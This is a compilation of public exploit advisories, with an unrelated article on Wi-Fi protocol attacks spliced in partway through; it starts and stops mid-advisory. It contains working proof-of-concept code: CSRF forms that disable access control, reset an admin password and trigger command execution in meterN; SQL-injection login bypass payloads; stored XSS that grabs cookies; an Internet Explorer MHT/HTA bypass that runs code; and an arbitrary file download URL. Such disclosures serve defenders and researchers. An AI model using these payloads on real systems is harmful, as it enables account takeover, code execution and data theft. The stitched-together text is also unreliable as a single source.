X3 (h02 build 4163) Start X1 (g01 build 2804) X1/X2/X3/X4/X7 Web Server Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5689 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5689.php 13.11.2021 --> CSRF disable AC: ---------------- <html> <body> <form action="http://10.0.0.2:8081/redirect.cgi"> <input type="hidden" name="flagAccessControlChanged" value="true" /> <input type="hidden" name="RAct" value="5" /> <input type="hidden" name="EnR" value="1" /> <input type="hidden" name="ExR" value="1" /> <input type="hidden" name="DenyRTout" value="5" /> <input type="hidden" name="DenyR" value="0" /> <input type="hidden" name="IType" value="0" /> <input type="hidden" name="E485" value="on" /> <input type="hidden" name="GType" value="0" /> <input type="hidden" name="TOO" value="50" /> <input type="hidden" name="TOC" value="50" /> <input type="hidden" name="TOOE" value="100" /> <input type="hidden" name="TOCE" value="100" /> <input type="submit" value="Submit request" /> </form> </body> </html> CSRF enable AC: --------------- <html> <body> <form action="http://10.0.0.2:8081/redirect.cgi"> <input type="hidden" name="flagAccessControlChanged" value="true" /> <input type="hidden" name="ACtrl" value="on" /> <input type="hidden" name="RAct" value="5" /> <input type="hidden" name="EnR" value="1" /> <input type="hidden" name="ExR" value="1" /> <input type="hidden" name="DenyRTout" value="5" /> <input type="hidden" name="DenyR" value="0" /> <input type="hidden" name="IType" value="0" /> <input type="hidden" name="E485" value="on" /> <input type="hidden" name="GType" value="0" /> <input type="hidden" name="TOO" value="50" /> <input type="hidden" name="TOC" value="50" /> <input type="hidden" name="TOOE" value="100" /> <input type="hidden" name="TOCE" value="100" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: Online Thesis Archiving System 1.0 - SQLi Authentication Bypass # Exploit Author: Yehia Elghaly (YME) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html # Version: Online Thesis Archiving System 1.0 # Tested on: Windows, xampp # CVE: N/A - Description:SQLi Authentication Bypass SQL Injection vulnerability exists in Online Thesis Archiving System 1.0 1.0. An admin account takeover exists with the payload: admin' # - admin' or '1'='1 PoC: POST /otas/admin/login.php HTTP/1.1 Host: 192.168.113.130 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 35 Origin: http://192.168.113.130 DNT: 1 Connection: close Referer: http://192.168.113.130/otas/admin/login.php Cookie: PHPSESSID=0jsudph494kpt2a5jvbvdvsrsc Upgrade-Insecure-Requests: 1 username=admin' #&password=admin' # - Description: Stored Cross Site Scripting (XSS) Stored Cross Site Scripting (XSS) exists in Online Thesis Archiving System 1.0. Steps: 1- Go to (http://localhost/otas/admin/?page=departments) and (http://localhost/otas/admin/?page=curriculum) 2- Add new (curriculum) or (department) 3- Insert your payload <script>("xssyf")</script>

# Exploit Title: Microsoft Internet Explorer / ActiveX Control - Security Bypass # Exploit Author: John Page (aka hyp3rlinx) # Website: hyp3rlinx.altervista.org # Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-ACTIVEX-CONTROL-SECURITY-BYPASS.txt # twitter.com/hyp3rlinx # ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Microsoft Internet Explorer (MSIE) Internet Explorer is a discontinued series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995. [Vulnerability Type] ActiveX Control Security Bypass [CVE Reference] N/A [Security Issue] Upon opening a specially crafted .MHT file on disk, Internet Explorer ActiveX control warnings as well as popup blocker privacy settings are not enforced. This can allow the execution of ActiveX content with zero warning to an unsuspecting end user and or force them to visit arbitrary attacker controlled websites. By default when opening browser associated files that contain active content, MSIE restricts scripts from running without explicit user interaction and permission. Instead end users are presented with a yellow warning bar on the browsers webpage, asking first if they wish to allow the running of blocked content. This prevents execution of active content scripts or controls without the user first clicking the "Allow blocked content" warning bar. However, specially crafted MHT files residing on disk that contain an invalid header directive suppress ActiveX warnings and Popup blocker privacy settings. Therefore, to bypass Internet Explorer "active content" blocking, files needs to contain an Content-Location header using an arbitrary named value E.g. "Content-Location: PBARBAR" Note, often times MHT files are set to open in IE by default and IE while discontinued it is still present on the Windows OS. Tested successfully on Windows 10 latest fully patched version with default IE security settings. Expected result: ActiveX control security warning, prevention of code execution and blocking browser popup windows. Actual result: No ActiveX control code execution blocking, security warnings or browser window popup blocking enforcement. [PoC Requirements] MHT file must reside on disk, think targeted attack scenarios. [Exploit/POC] Change [VICTIM] value below to a specified user for testing. 1) Create the MHT PoC file. "MSIE_ActiveX_Control_Security_Bypass.mht" From: Subject: Date: MIME-Version: 1.0 Content-Type: multipart/related; type="text/html"; boundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001" This is a multi-part message in MIME format. --=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001 Content-Type: text/html; charset="UTF-8" Content-Location: DOOM <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> </head> <body> <script> win=window win.open("http://www.microsoft.com","","width=600,height=600") var args = ['height='+1,'width='+1,].join(',') setTimeout("", 3000) var pop = win.open('c:/Users/[VICTIM]/Desktop/Sales_Report_2021.csv ________________________________________________________.hta', 'pop', args) pop.moveTo(2000,2000) </script> </body> </html> --=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001-- 2) Create the PoC HTA file. "Sales_Report_2021.csv ________________________________________________________.hta" <HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" /> <script language="VBScript"> Set WshShell = CreateObject("WScript.Shell") WshShell.Run("calc.exe") </script> 3) Open the MHT file locally. [Network Access] Local [POC/Video URL] https://www.youtube.com/watch?v=UCSqFbYUvBk [Disclosure Timeline] Vendor Notification: May 13, 2019 MSRC : July 2, 2019 "We determined that a fix for this issue will be considered in a future version of this product or service. At this time, we will not be providing ongoing updates of the status of the fix for this issue, and we have closed this case." December 5, 2021 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

This article includes wireless security protocols including WEP, WPA, WPA2 and WPA3. For each of them, we will try to point out their advantages and disadvantages and describe some possible attacks. WEP protocol WEP was introduced as part of the original 802.11 standard approved in 1997 and it is probably the most commonly used WiFi security protocol. Its 10-bit or 26-bit hexadecimal digits (40-bit or 104-bit) key is very easy to identify. In 2004, both WEP-40 and WEP-104 were declared deprecated. There are 128-bit (the most common) and 256-bitWEP variants, but as computing power continues to improve, attackers are able to exploit many security vulnerabilities. In short, this protocol can no longer meet security needs. It uses an RC4 password to ensure privacy and uses a CRC-32 checksum to ensure the integrity of the transmitted data. First, a key k is shared between network users (the protocol does not specify how to share) To send a message M, the integrity checksum of the message must be calculated and connected: there is now Mc(M). Mc(M) is then encrypted by exOR with the RC4 stream generated by k and a 24-bit common initialization vector (IV) named v. We record it as RC4 (v, k). The result C=Mc(M) ⊕ RC4(v, k) is sent to the network, and users who know k can get the message through XORing C and RC4(v, k). WEP uses RC4 stream cipher based on two algorithms: The first is RC4-Key Scheduled Algorithm (KSA), which converts a key of length 1 to 256 bits into an initial arrangement S with numbers 0 to N. The internal state of RC4 consists of two numbers i and j, which are used as elements with pointer S. The second algorithm is the RC4-pseudo-random generation algorithm (PRGA). It generates a single byte key stream from the current internal state of RC4 and then updates the internal state. Initially, N=255, but the algorithm can use different N values. With CRC32, the original message is XORed with a 32-bit constant followed by as many 0 as possible to reach the length of the message. The result becomes a new "message" and the operation is repeated until the length of the result is lower than the length of the constant. It should be noted that this hash function is linear and bondless. WEP Attack: Packet Injection Fake Authentication FMS Attack KoreK Attack Chop Attack Fragment Attack PTW Attack (Pychkine, Tews, Weinmann) Package Injection This allows external personnel to generate a large amount of traffic on the network without having to be associated with it in any way. First, he must capture a specific type of packet. Although hidden behind encryption, packet type can be easily guessed based on packet size. An ARP request package is always 28 bytes. By reinjecting it into the network, the AP will respond to this forgery request and send packets to the legitimate client. The extra traffic is used to collect encrypted packets faster, and the more packets the more likely he is to destroy WEP faster. Fake authentication Fake authentication attack allows an attacker to join a WEP-protected network, even if he does not know the root key. Clients can authenticate themselves in WEP-protected networks in two ways: The first method is to open system authentication, with basically no protection. The second method is called shared key authentication. This uses a secret root key and challenge-response authentication. The client requires an AP to connect, and the AP sends a frame containing a challenge (random byte string, plaintext), and the client answers using WEP encrypted frames. If there is no problem, the AP will reply successfully. An attacker who sniffs out a handshake can join the network itself. Except for the AP challenge, all bytes in frame 3 are constant. The challenge is transmitted in plaintext in frame 2, so the attacker can recover the key stream (and IV) used to encrypt frame 3. With it, he can now initiate the authentication handshake and construct a valid frame (number 3). FMS Attack Released in 2001 by Fluhrrer, Mantin, and Shamir, it is based on the awareness of RC4 weaknesses with IVs (initialization vectors or random numbers, 3 bytes per packet key). The attacker can manipulate RC4, allowing him to guess one byte (5% probability) of the key. If the key is wrong, the attacker will try again with the new key. To achieve a 50% success rate, an attacker needs to capture a large number of packets (up to 6 million). If we know the first "l" bytes of each packet key, we can simulate RC4-KSA. Don't want the math here to go too deep, basically the next byte's key depends on (a bit related) the current byte and can be used to check if we are on the right track. Each iteration, we get one more byte of key and end up testing it. If it is wrong, the bytes of the key are switching with another possible value and restarting the process. KoreK Attack This is based on an FMS attack (first appeared in the netstumbler forum, 2004), but allows the attacker to find the key faster. ChopChop Attack Also found by "KoreK", it opposed exploiting the weakness of RC4, which attacks the WEP protocol itself (CRC32 checksum and lack of playback protection). It enables an attacker to decrypt packets without knowing the key. Flip a bit in the ciphertext and then calculate which bit in the encrypted CRC32 value must be flipped so that the packet remains valid. The often mentioned method is to take out the last byte and try to guess its value. Splitting Attack If there is currently no client connected to the access point, a good attack can be run. Similar to the ChopChop attack, it speeds up the cracking process by injecting arbitrary packets into the AP. It will generate enough traffic to capture a large number of IVs, thereby improving the chances of cracking the keys (aircrack-ng). "aireplay-ng" and "packetforge-ng" are standard toolkits for such attacks. PTW Attack Pyshkin Tews Winmann (PTW) attack, released in 2007. What makes PTW more powerful than all other attacks is that it can take advantage of every packet captured. Instead of trying all possible key combinations, it implements a key sorting strategy, selects a set of possible keys and continues with the RC4 algorithm based on these keys. Using different voting strategies, an attacker can select the most likely key byte in each decision in the tree to determine the correct key. Tests show that a 50% chance of success is obtained by just 35,000 to 40,000 packets. Other sources point out that we can get a 95% chance in 85,000 frames. WPA WPA was launched in 2003 and is a direct response and replacement for the Wi-Fi Alliance to increasingly obvious vulnerabilities in the WEP encryption standard. The most common WPA configuration is WPA-PSK (Pre-Shared Key). The key used by WPA is a significant increase in keys 256-bit than used in WEP systems. 64-bit128-bit Note: WPA-PSK basically means that the Wi-Fi network has a password shared by each Wi-Fi network client. WPA includes message integrity checks (to determine if an attacker has captured/changed packets passed between the access point and the client) and Temporary Key Integrity Protocol (TKIP). TKIP uses a per-packet key system, which is more secure than the fixed key system used by WEP. The TKIP encryption standard was later replaced by the Advanced Encryption Standard (AES). TKIP uses the same underlying mechanism as WEP and is therefore vulnerable to many similar attacks (such as Chop-Chop, MIC key recovery attacks). Usually people do not directly attack the WPA protocol, but use the supplementary system ——Wi-Fi Protected Setup (WPS), which is launched by WPA. Note: TKIP (Temporary Key Integrity Protocol) ——RC4 stream cipher is used with 128-bit per packet key, which means it dynamically generates a new key for each packet. Although still in use, it was considered obsolete after being replaced by CCMP in 2009. WPA Attack: Back and Tews Improved Attack on RC4, 2008, Inject Ohigashi-Morii Attack (Beck and Tews' + Man in the middle) Michael Attacks Dictionary Attack Handshake, Key Recovery The attack "requires" to enable Quality of Service (QoS) (actually). This allows multiple channels to be used. Each channel has its own TSC (TKIP sequence counter). Channel 0 has most of the traffic, and the other channels have lower TSCs. The attack requires that the Key Renewal Interval be greater than 15 minutes (the time it takes to decrypt the ARP packet). The attacker unauthenticates the site and then captures the ARP packet. Next, he will perform the modified ChopChop attack to recover the packet's ICV (integrity check value) and MIC. In this way, the attacker needs to guess the last part of the packet, i.e. the IP address. Finally, he inverts the MICHAEL algorithm and obtains the MIC key. With it, he can now inject custom packets into the network. Countermeasure: Disable QoS. Two types of keys used for data encryption: Pairwise Transient Key (PTK) – Used to protect unicast data frames Group Temporary Key (GTK) – Used to protect group addressed data frames (such as broadcasting ARP frames) The attacker sends an ARP request (with his MAC and AP's IP address), so other clients update their ARP table. This way, all clients will send their packets to the attacker. The attacker will receive packets decrypted by the AP and reencrypt them with his own key. Everyone can build and broadcast fake packets using GTK. Messages sent with group keys are not protected against spoofing. WPA2 protocol Of course, WPA2 replaces WPA. Certification began in September 2004 and from March 13, 2006, all new devices must be trademarked with Wi-Fi. The most important upgrade is to force the use of the AES algorithm (rather than the previous RC4) and introduce CCMP (AES CCMP, counter cipher mode with block link message verification code protocol, 128 bits) as a replacement for TKIP (still present in WPA2) as a backup system and WPA interoperability). As in previous versions, attacks on WPS are the most common attacks. Note: WPA/WPA2 MGT (Administrative) means that the password is not a pre-encrypted key, but uses an authentication service, usually a RADIUS service that verifies the username/password of a Wi-Fi network client. MGT is most often associated with an enterprise/professional environment. WPA2 Attack: KRACK Attack PMKID Attack (PSK)WPS Attack Dictionary Attack KRACK Attack This attack targets four handshakes used to establish random numbers (a kind of "shared secret") in the WPA2 protocol. The WPA2 standard expects WiFi to be occasionally disconnected and allows reconnection with the same value during the third handshake (for fast reconnection and continuity). Since this standard does not require different keys to be used in this type of reconnection, which may be required at any time, replay attacks are possible. Countermeasure: The access point has configuration options that can disable EAPOL-Key frame retransmission during key installation. Useful: Key Reinstall Attack: Force Nonce Reuse in WPA2 PMKID Attack (PSK) On August 4, 2018, a new exploit was released for Wi-Fi networks using WPA/WPA2-PSK (pre-shared key). The vulnerability allows an attacker to obtain a PSK for a specific SSID. The attack was unexpectedly discovered while looking for new methods to attack the new WPA3 security standards. The main difference compared to other attacks is that in this attack, there is no need to capture a complete EAPOL 4 handshake. The new attack is performed against RSN IEs of a single EAPOL frame. Normal users are no longer needed because the attacker communicates directly with the AP (also known as a "clientless" attack). You do not need to wait for 4 handshakes between the average user and the AP. No more retransmission of EAPOL frames (which may lead to uncrackable results) and invalid passwords sent by ordinary users. EAPOL frames are not lost when a normal user or AP is too far from an attacker. Nonce and replay counter values are no longer required (causing slightly higher speeds). There are no more special output formats (pcap, hccapx, etc.) —— final data will be displayed as a regular hexadecimal encoded string. Source: https ://hashcat.net/forum/thread-7717.html Countermeasures: It is recommended to disable 802.11r on the WPA/WPA2-PSK network. WPS Attack WPS was launched in 2006, and the goal of the protocol is to allow Wi-Fi-protected access to home users who know very little about wireless security, and to easily add new devices to existing networks without entering a long password. In December 2011, a vulnerability was discovered to affect a WPS-capable wireless router. The vulnerability allows remote attackers to recover WPS PIN within a few hours through brute force attacks and use WPS PIN to recover the network's WPA/WPA2 pre-shared key. WPS enables clients to send 8-bit pins to the access point, which the access point verifies and then allows clients to connect. Pin contains only numbers, and there is a latency in WPS because the attacker needs to wait for the AP to respond. Therefore, an attacker can try several keys per second (or one key per few seconds). We have 8 numbers and 10 numbers here, 10 8 (100.000.000). This is too much. The 8th bit is the checksum of the top 7 bits, so we have 10 7. Additionally, the password used for verification is divided into two halves, so we can verify the first 4 and last 4 digits independently. It is much easier to guess a 4-digit 2 at a time than an 8-digit 1. Finally, the math finally gets: 10 4 + 10 3=11,000 guesses. While this strategy used to take hours, the newer WPS Pixie-Dust attacks could crack the network in seconds. Since 2011, many routers now have protections to detect and slow down (rate limit) or turn off Reaver type attacks (locking too many failed PIN attempts). Routers have updated some settings to prevent WPS, but the way they implement encryption remains flawed. Creating true random numbers is relatively difficult, which is necessary to generate strong encryption. To achieve this, there is usually a function that takes a "seed" and produces a pseudo-random number. If you use long or variable "seed" numbers, you can get the same results as actually random numbers, but if you use "seed" that is easy to guess, or worse, using the same "seed" time and time again, you end up with weak encryption that is easy to crack. That's what happens with those newer routers, what the WPS Pixie-Dust attacks exploit. Countermeasure: Turn off WPS function. Dictionary Attack This relies on capturing the WPA handshake and then using a word list or brute force to crack the password. Depending on the password strength (length, character set), it can be difficult or impossible to crack it in a "reasonable" time. Countermeasure: Use long passwords (12+) and different character sets (alphanumeric, special characters, uppercase/lowercase). WPA3 protocol In January 2018, the Wi-Fi Alliance announced WPA3 to replace WPA2. The new standard 128-bit uses encryption in WPA3-person mode (WPA-PSK pre-shared key) or 192-bit WPA3-enterprise (RADIUS authentication server). WPA3 will be harder to attack because its modern key establishment protocol is called "simultaneous verification equality" (SAE) or dragonfly key exchange. SAE improves security of initial key exchange and provides better protection against offline dictionary attacks. But it is equally vulnerable to man-in-the-middle attacks and cannot resist evil WiFi phishing attacks.

# Exploit Title: meterN v1.2.3 - Remote Code Execution (RCE) (Authenticated) # Date: 18/11/2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.metern.org <!-- meterN v1.2.3 Authenticated Remote Command Execution Vulnerability Vendor: Jean-Marc Louviaux Product web page: https://www.metern.org Affected version: 1.2.3 and 0.8.3.2 Summary: meterN is a set of PHP/JS files that make a -Home energy metering & monitoring- solution. It accept any meters like : electrical, water, gas, fuel consumption, solar, Wind energy production and so on. Sensors such as temperature or humidity are also accepted. The philosophy is: To keep it simple, fast, with a low foot print to run on cheap and low powered devices. Desc: The application suffers from an authenticated OS command execution vulnerability. This can be exploited to execute arbitrary commands through the 'COMMANDx' and 'LIVECOMMANDx' POST parameters in admin_meter2.php and admin_indicator2.php scripts. The application interface allows users to perform these actions through HTTP requests without performing any validity checks to verify the requests. This CSRF can be exploited to perform actions with administrative privileges if a logged-in user visits a malicious web site. --------------------------------------------------------------------------------------------------- /admin/admin_meter2.php: ------------------------ 69: if (!empty($_POST['COMMANDx']) && is_string($_POST['COMMANDx'])) { 70: $COMMANDx = htmlspecialchars($_POST['COMMANDx'], ENT_QUOTES, 'UTF-8'); 71: } else { 72: $COMMANDx = ''; 73: } ... ... 108: if (!empty($_POST['LIVECOMMANDx']) && is_string($_POST['LIVECOMMANDx'])) { 109: $LIVECOMMANDx = htmlspecialchars($_POST['LIVECOMMANDx'], ENT_QUOTES, 'UTF-8'); 110: } else { 111: $LIVECOMMANDx = ''; 112: } ... ... 271: exec("$COMMANDx 2>&1", $datareturn); ... ... 303: exec("$LIVECOMMANDx 2>&1", $datareturn); --------------------------------------------------------------------------------------------------- Tested on: Apache/2.4.10 (Raspbian) Apache/2.4.46 (Win64) Linux 4.9.67-v7+ GNU/Linux (armv7l) Microsoft Windows 10 Home (10.0.19042 Build 19042) PHP/7.2.33 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5690 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5690.php 18.11.2021 --> PoC #1: ------- <html> <body> <form action="http://localhost/metern/admin/admin_indicator2.php" method="POST"> <input type="hidden" name="NUMINDx" value="1" /> <input type="hidden" name="INDNAMEx1" value="test" /> <input type="hidden" name="IDx1" value="1" /> <input type="hidden" name="COMMANDx1" value="calc" /> <input type="hidden" name="bntsubmit1" value="Test&#32;command" /> <input type="hidden" name="UNITx1" value="" /> <input type="submit" value="Incongruity" /> </form> </body> </html> PoC #2: ------- <html> <body> <form action="http://localhost/metern/admin/admin_meter2.php" method="POST"> <input type="hidden" name="METNAMEx" value="Conso" /> <input type="hidden" name="COLORx" value="962629" /> <input type="hidden" name="TYPEx" value="Elect" /> <input type="hidden" name="PRODx" value="2" /> <input type="hidden" name="PHASEx" value="1" /> <input type="hidden" name="SKIPMONITORINGx" value="" /> <input type="hidden" name="IDx" value="elect" /> <input type="hidden" name="COMMANDx" value="houseenergy&#32;&#45;energy" /> <input type="hidden" name="PASSOx" value="100000" /> <input type="hidden" name="PRICEx" value="0&#46;23" /> <input type="hidden" name="LIDx" value="elect" /> <input type="hidden" name="LIVECOMMANDx" value="calc" /> <input type="hidden" name="bntsubmit" value="Test&#32;live&#32;command" /> <input type="hidden" name="EMAILx" value="" /> <input type="hidden" name="WARNCONSODx" value="15000" /> <input type="hidden" name="NORESPMx" value="true" /> <input type="hidden" name="POAKEYx" value="" /> <input type="hidden" name="POUKEYx" value="" /> <input type="hidden" name="TLGRTOKx" value="" /> <input type="hidden" name="TLGRCIDx" value="" /> <input type="hidden" name="met&#95;numx" value="1" /> <input type="submit" value="Incongruity" /> </form> </body> </html>

# Exploit Title: Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration # Date: 13/12/2021 # Exploit Author: Daniel Morales, IT Security Team - ARHS Spikeseed # Vendor Homepage: https://www.cybelesoft.com # Software Link: https://www.cybelesoft.com/thinfinity/virtualui/ # Version: vulnerable < v3.0 # Tested on: Microsoft Windows # CVE: CVE-2021-44848 How it works: By accessing the vector, an attacker can determine if a username exists thanks to the message returned; it can be presented in different languages according to the configuration of VirtualUI. Common users are administrator, admin, guest... Payload: The vulnerable vector is "https://example.com/changePassword?username=USERNAME" where "USERNAME" need to be brute-forced. Reference: https://github.com/cybelesoft/virtualui/issues/1

# Exploit Title: Oliver Library Server v5 - Arbitrary File Download # Date: 14/12/2021 # Exploit Authors: Mandeep Singh, Ishaan Vij, Luke Blues, CTRL Group # Vendor Homepage: https://www.softlinkint.com/product/oliver/ # Product: Oliver Server v5 # Version: < 8.00.008.053 # Tested on: Windows Server 2016 Technical Description: An arbitrary file download vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file download by an attacker using unsanitized user supplied input. Steps to Exploit: 1) Use the following Payload: https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=<arbitrary file path> 2) Example to download iis.log file: https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=c:/windows/iis.log

# Exploit Title: Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF) # Date: November 29, 2021 # Exploit Author: =(L_L)= # Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/ # Vendor Homepage: https://github.com/arunna # Software Link: https://github.com/arunna/arunna # Version: 1.0.0 # Tested on: Ubuntu 20.04.2 LTS <!-- The attacker can use the CSRF PoC below to change any sensitive user data (password, email, name and so on). --> <html><form enctype="application/x-www-form-urlencoded" method="POST" action="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"><table><tr><td>username[0]</td><td><input type="text" value="admin" name="username[0]"></td></tr><tr><td>select[0]</td><td><input type="text" value="" name="select[0]"></td></tr> <tr><td>first_name[0]</td><td><input type="text" value="Raden" name="first_name[0]"></td></tr> <tr><td>last_name[0]</td><td><input type="text" value="Yudistira" name="last_name[0]"></td></tr> <tr><td>display_name[0]</td><td><input type="text" value="Raden Yudistira" name="display_name[0]"></td></tr> <tr><td>one_liner[0]</td><td><input type="text" value="" name="one_liner[0]"></td></tr> <tr><td>location[0]</td><td><input type="text" value="" name="location[0]"></td></tr> <tr><td>sex[0]</td><td><input type="text" value="1" name="sex[0]"></td></tr> <tr><td>birthday[0]</td><td><input type="text" value="19" name="birthday[0]"></td></tr> <tr><td>birthmonth[0]</td><td><input type="text" value="3" name="birthmonth[0]"></td></tr> <tr><td>birthyear[0]</td><td><input type="text" value="2011" name="birthyear[0]"></td></tr> <tr><td>bio[0]</td><td><input type="text" value="" name="bio[0]"></td></tr> <tr><td>expertise[0][]</td><td><input type="text" value="5" name="expertise[0][]"></td></tr> <tr><td>tags[0]</td><td><input type="text" value="Graphic Designer, Blogger, Director" name="tags[0]"></td></tr> <tr><td>skills[0]</td><td><input type="text" value="Cooking, JQuery, Fireworks" name="skills[0]"></td></tr> <tr><td>email[0]</td><td><input type="text" value="request@arunna.com" name="email[0]"></td></tr> <tr><td>website[0]</td><td><input type="text" value="http://" name="website[0]"></td></tr> <tr><td>password[0]</td><td><input type="text" value="admin12345" name="password[0]"></td></tr> <tr><td>re_password[0]</td><td><input type="text" value="admin12345" name="re_password[0]"></td></tr> <tr><td>user_type[0]</td><td><input type="text" value="administrator" name="user_type[0]"></td></tr> <tr><td>status[0]</td><td><input type="text" value="1" name="status[0]"></td></tr> <tr><td>save_changes</td><td><input type="text" value="Save User" name="save_changes"></td></tr> </table><input type="submit" value="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"></form></html>

# Exploit Title: Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS) # Date: 06/12/2021 # Exploit Author: Enes Özeser # Vendor Homepage: https://croogo.org/ # Software Link: https://downloads.croogo.org/v3.0.2.zip # Version: 3.0.2 # Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3 ==> 'Content-Type' Stored Cross-Site Scripting (/admin/file-manager/attachments/add) <== POST /admin/file-manager/attachments/add HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------114221148012003093972656004730 Content-Length: 923 Origin: http://(HOST) Connection: close Referer: http://(HOST)/admin/file-manager/attachments/add Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 -----------------------------114221148012003093972656004730 Content-Disposition: form-data; name="_method" POST -----------------------------114221148012003093972656004730 Content-Disposition: form-data; name="_csrfToken" c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a -----------------------------114221148012003093972656004730 Content-Disposition: form-data; name="file"; filename="file.txt" Content-Type: <script>alert(document.cookie)</script> Enes Ozeser (@enesozeser) -----------------------------114221148012003093972656004730 Content-Disposition: form-data; name="_Token[fields]" 16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A -----------------------------114221148012003093972656004730 Content-Disposition: form-data; name="_Token[unlocked]" -----------------------------114221148012003093972656004730-- ==> 'title' Stored Cross-Site Scripting (/admin/taxonomy/types/edit/) <== POST /admin/taxonomy/types/edit/5 HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 590 Origin: http://(HOST) Connection: close Referer: http://(HOST)admin/taxonomy/types/edit/5 Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 _method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a& title=<script>alert(document.cookie)</script>&alias=Alias&description=Description&vocabularies[_ids]=&comment_status=&comment_status=2&comment_approve=0& comment_approve=1&comment_spam_protection=0&comment_captcha=0&params=routes=true&format_show_author=0&format_show_author=1&format_show_date=0&format_show_date=1& format_use_wysiwyg=0&format_use_wysiwyg=1&_Token[fields]=ee5145e2485f47bddda98c72f96db218bffdd827%3A&_Token[unlocked]=_apply ==> 'title' Stored Cross-Site Scripting (/admin/blocks/regions/edit/) <== POST /admin/blocks/regions/edit/3 HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 336 Origin: http://(HOST) Connection: close Referer: http://(HOST)/admin/blocks/regions/edit/3 Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 